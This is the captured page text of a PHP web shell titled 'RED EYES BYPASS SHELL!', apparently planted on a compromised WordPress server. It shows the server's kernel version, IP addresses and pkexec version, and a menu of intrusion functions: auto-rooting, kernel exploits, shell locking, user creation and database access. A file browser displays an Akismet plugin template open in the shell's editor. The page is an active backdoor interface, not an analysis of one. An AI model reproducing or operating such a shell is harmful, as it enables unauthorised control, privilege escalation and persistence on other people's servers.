Linux sothorn202 5.15.0-164-generic #174-Ubuntu SMP Fri Nov 14 20:25:16 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
sdgs /
wp-content /
plugins /
akismet /
views /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
activate.php
177
B
-rwxr-xr-x
config.php
14.75
KB
-rwxr-xr-x
connect-jp.php
4.98
KB
-rwxr-xr-x
enter.php
1.02
KB
-rwxr-xr-x
get.php
1017
B
-rwxr-xr-x
logo.php
770
B
-rwxr-xr-x
notice.php
13.07
KB
-rwxr-xr-x
predefined.php
318
B
-rwxr-xr-x
setup.php
324
B
-rwxr-xr-x
start.php
816
B
-rwxr-xr-x
stats.php
1.05
KB
-rwxr-xr-x
title.php
125
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : start.php
<?php //phpcs:disable VariableAnalysis // There are "undefined" variables here because they're defined in the code that includes this file as a template. ?> <div id="akismet-plugin-container"> <div class="akismet-masthead"> <div class="akismet-masthead__inside-container"> <?php Akismet::view( 'logo' ); ?> </div> </div> <div class="akismet-lower"> <?php Akismet_Admin::display_status();?> <div class="akismet-boxes"> <?php if ( Akismet::predefined_api_key() ) { Akismet::view( 'predefined' ); } elseif ( $akismet_user && in_array( $akismet_user->status, array( 'active', 'active-dunning', 'no-sub', 'missing', 'cancelled', 'suspended' ) ) ) { Akismet::view( 'connect-jp', compact( 'akismet_user' ) ); } else { Akismet::view( 'activate' ); } ?> </div> </div> </div>
Close